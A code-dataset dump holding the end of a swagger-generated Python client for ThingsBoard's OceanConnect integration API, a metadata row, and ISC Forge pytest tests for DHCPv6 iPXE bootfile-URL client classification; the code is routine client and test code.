:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_delete_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_delete_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_delete_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_delete`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_delete`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
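# Usage sketch (illustrative only; the host URL, JWT token and routing key are
# placeholders, and Configuration is assumed to be the standard swagger-codegen
# configuration class shipped in tb_rest_client.configuration):
#
#   from tb_rest_client.api_client import ApiClient
#   from tb_rest_client.configuration import Configuration
#
#   configuration = Configuration()
#   configuration.host = "https://thingsboard.example.com"
#   configuration.api_key['X-Authorization'] = 'Bearer <JWT token>'
#   api = OceanConnectIntegrationControllerApi(ApiClient(configuration))
#   result = api.process_request_using_post4("my-routing-key", msg="{}", request_headers={})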
def process_request_using_get(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_get_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_get_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_get_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_get`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_get`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_head(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_head_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_head_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_head_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_head`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_head`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_head`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_options(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_options_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_options_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_options_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_options`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_options`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_options`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'OPTIONS',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_patch(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_patch(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_patch_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_patch_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data

    def process_request_using_patch_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
        """processRequest # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.process_request_using_patch_with_http_info(routing_key, msg, request_headers, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str routing_key: routingKey (required)
        :param str msg: msg (required)
        :param object request_headers: requestHeaders (required)
        :return: DeferredResultResponseEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'routing_key' is set
        if ('routing_key' not in params or
                params['routing_key'] is None):
            raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_patch`") # noqa: E501
        # verify the required parameter 'msg' is set
        if ('msg' not in params or
                params['msg'] is None):
            raise ValueError("Missing the required parameter `msg` when calling `process_request_using_patch`") # noqa: E501
        # verify the required parameter 'request_headers' is set
        if ('request_headers' not in params or
                params['request_headers'] is None):
            raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_patch`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'routing_key' in params:
            path_params['routingKey'] = params['routing_key'] # noqa: E501

        query_params = []

        header_params = {}
        if 'request_headers' in params:
            header_params['requestHeaders'] = params['request_headers'] # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'msg' in params:
            body_params = params['msg']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization'] # noqa: E501

        return self.api_client.call_api(
            '/api/v1/integrations/oceanconnect/{routingKey}', 'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='DeferredResultResponseEntity', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def process_request_using_post4(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
        """processRequest # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.process_request_using_post4(routing_key, msg, request_headers, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str routing_key: routingKey (required)
        :param str msg: msg (required)
        :param object request_headers: requestHeaders (required)
        :return: DeferredResultResponseEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.process_request_using_post4_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
        else:
            (data) = self.process_request_using_post4_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
            return data

    def process_request_using_post4_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
        """processRequest # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.process_request_using_post4_with_http_info(routing_key, msg, request_headers, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str routing_key: routingKey (required)
        :param str msg: msg (required)
        :param object request_headers: requestHeaders (required)
        :return: DeferredResultResponseEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'routing_key' is set
        if ('routing_key' not in params or
                params['routing_key'] is None):
            raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_post4`") # noqa: E501
        # verify the required parameter 'msg' is set
        if ('msg' not in params or
                params['msg'] is None):
            raise ValueError("Missing the required parameter `msg` when calling `process_request_using_post4`") # noqa: E501
        # verify the required parameter 'request_headers' is set
        if ('request_headers' not in params or
                params['request_headers'] is None):
            raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_post4`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'routing_key' in params:
            path_params['routingKey'] = params['routing_key'] # noqa: E501

        query_params = []

        header_params = {}
        if 'request_headers' in params:
            header_params['requestHeaders'] = params['request_headers'] # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'msg' in params:
            body_params = params['msg']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization'] # noqa: E501

        return self.api_client.call_api(
            '/api/v1/integrations/oceanconnect/{routingKey}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='DeferredResultResponseEntity', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def process_request_using_put(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
        """processRequest # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.process_request_using_put(routing_key, msg, request_headers, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str routing_key: routingKey (required)
        :param str msg: msg (required)
        :param object request_headers: requestHeaders (required)
        :return: DeferredResultResponseEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.process_request_using_put_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
        else:
            (data) = self.process_request_using_put_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
            return data

    def process_request_using_put_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
        """processRequest # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_pe.process_request_using_put_with_http_info(routing_key, msg, request_headers, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str routing_key: routingKey (required)
        :param str msg: msg (required)
        :param object request_headers: requestHeaders (required)
        :return: DeferredResultResponseEntity
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'routing_key' is set
        if ('routing_key' not in params or
                params['routing_key'] is None):
            raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_put`") # noqa: E501
        # verify the required parameter 'msg' is set
        if ('msg' not in params or
                params['msg'] is None):
            raise ValueError("Missing the required parameter `msg` when calling `process_request_using_put`") # noqa: E501
        # verify the required parameter 'request_headers' is set
        if ('request_headers' not in params or
                params['request_headers'] is None):
            raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_put`") # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'routing_key' in params:
            path_params['routingKey'] = params['routing_key'] # noqa: E501

        query_params = []

        header_params = {}
        if 'request_headers' in params:
            header_params['requestHeaders'] = params['request_headers'] # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'msg' in params:
            body_params = params['msg']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*']) # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization'] # noqa: E501

        return self.api_client.call_api(
            '/api/v1/integrations/oceanconnect/{routingKey}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='DeferredResultResponseEntity', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 43.763454 | 139 | 0.638659 | 3,975 | 34,967 | 5.349686 | 0.048302 | 0.044768 | 0.05629 | 0.046085 | 0.960357 | 0.957771 | 0.957771 | 0.956219 | 0.954667 | 0.954667 | 0 | 0.015185 | 0.27117 | 34,967 | 798 | 140 | 43.818296 | 0.819227 | 0.326279 | 0 | 0.845972 | 0 | 0 | 0.231127 | 0.072122 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035545 | false | 0 | 0.009479 | 0 | 0.097156 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
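The docstrings in the generated client above describe a single calling convention: each endpoint method is synchronous by default and, when called with async_req=True, dispatches the call to a thread pool and returns a handle whose .get() yields the decoded DeferredResultResponseEntity. Below is a minimal, self-contained sketch of that dispatch pattern only — the SketchApi class, its method name, and the echoed payload are illustrative stand-ins and not part of the ThingsBoard client itself:

from multiprocessing.pool import ThreadPool


class SketchApi:
    """Illustrates the sync/async convention used by swagger-codegen methods."""

    def __init__(self):
        self.pool = ThreadPool(4)

    def process_request(self, routing_key, msg, request_headers, **kwargs):
        if kwargs.get('async_req'):
            # Return immediately with a thread handle, like the real client.
            return self.pool.apply_async(self._call, (routing_key, msg, request_headers))
        return self._call(routing_key, msg, request_headers)

    def _call(self, routing_key, msg, request_headers):
        # Stand-in for api_client.call_api(); just echoes its inputs.
        return {'routingKey': routing_key, 'body': msg, 'headers': request_headers}


api_pe = SketchApi()
print(api_pe.process_request('my-key', {'temp': 21}, {}))                    # synchronous
thread = api_pe.process_request('my-key', {'temp': 21}, {}, async_req=True)  # asynchronous
print(thread.get())                                                          # blocks for the result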
047d4eab926676a1b060945ea252eb410fe8fc92 | 5,236 | py | Python | tests/dhcpv6/classification/test_v6_ipxe.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 22 | 2015-02-27T11:51:05.000Z | 2022-02-28T12:39:29.000Z | tests/dhcpv6/classification/test_v6_ipxe.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 16 | 2018-10-30T15:00:12.000Z | 2019-01-11T17:55:13.000Z | tests/dhcpv6/classification/test_v6_ipxe.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 11 | 2015-02-27T11:51:36.000Z | 2021-03-30T08:33:54.000Z | """DHCPv6 iPXE boot tests"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_control
import srv_msg


@pytest.mark.v6
@pytest.mark.iPXE
def test_v6_IPXE_1():
    misc.test_setup()
    srv_control.config_srv_subnet('2001:db8::/64', '$(EMPTY)')
    srv_control.create_new_class('a-ipxe')
    srv_control.add_test_to_class(1, 'test', 'substring(option[15].hex,2,4) == \'iPXE\'')
    srv_control.add_option_to_defined_class(1,
                                            'bootfile-url',
                                            'http://[2001:db8::1]/ubuntu.cfg')
    # Server is configured with client-classification option in subnet 0 with name a-ipxe.
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'archtypes', 7)
    srv_msg.client_does_include('Client', 'client-arch-type')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_sets_value('Client', 'user_class_data', 'iPXE')
    srv_msg.client_does_include('Client', 'user-class')
    srv_msg.client_requests_option(59)
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(59)
    srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ubuntu.cfg')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)


@pytest.mark.v6
@pytest.mark.iPXE
def test_v6_IPXE_2():
    misc.test_setup()
    srv_control.config_srv_subnet('2001:db8::/64', '$(EMPTY)')
    srv_control.create_new_class('a-ipxe')
    srv_control.add_test_to_class(1, 'test', 'option[61].hex == 0x0007')
    srv_control.add_option_to_defined_class(1, 'bootfile-url', 'http://[2001:db8::1]/ipxe.efi')
    # Server is configured with client-classification option in subnet 0 with name a-ipxe.
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'archtypes', 7)
    srv_msg.client_does_include('Client', 'client-arch-type')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_requests_option(59)
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(59)
    srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ipxe.efi')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)


@pytest.mark.v6
@pytest.mark.iPXE
def test_v6_IPXE_combined():
    misc.test_setup()
    srv_control.config_srv_subnet('2001:db8::/64', '$(EMPTY)')
    srv_control.create_new_class('a-ipxe')
    srv_control.add_test_to_class(1, 'test', 'substring(option[15].hex,2,4) == \'iPXE\'')
    srv_control.add_option_to_defined_class(1,
                                            'bootfile-url',
                                            'http://[2001:db8::1]/ubuntu.cfg')
    srv_control.create_new_class('b-ipxe')
    srv_control.add_test_to_class(2, 'test', 'option[61].hex == 0x0007')
    srv_control.add_option_to_defined_class(2, 'bootfile-url', 'http://[2001:db8::1]/ipxe.efi')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'archtypes', 7)
    srv_msg.client_does_include('Client', 'client-arch-type')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_requests_option(59)
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(59)
    srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ipxe.efi')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'archtypes', 7)
    srv_msg.client_does_include('Client', 'client-arch-type')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_sets_value('Client', 'user_class_data', 'iPXE')
    srv_msg.client_does_include('Client', 'user-class')
    srv_msg.client_requests_option(59)
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(59)
    srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ubuntu.cfg')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)
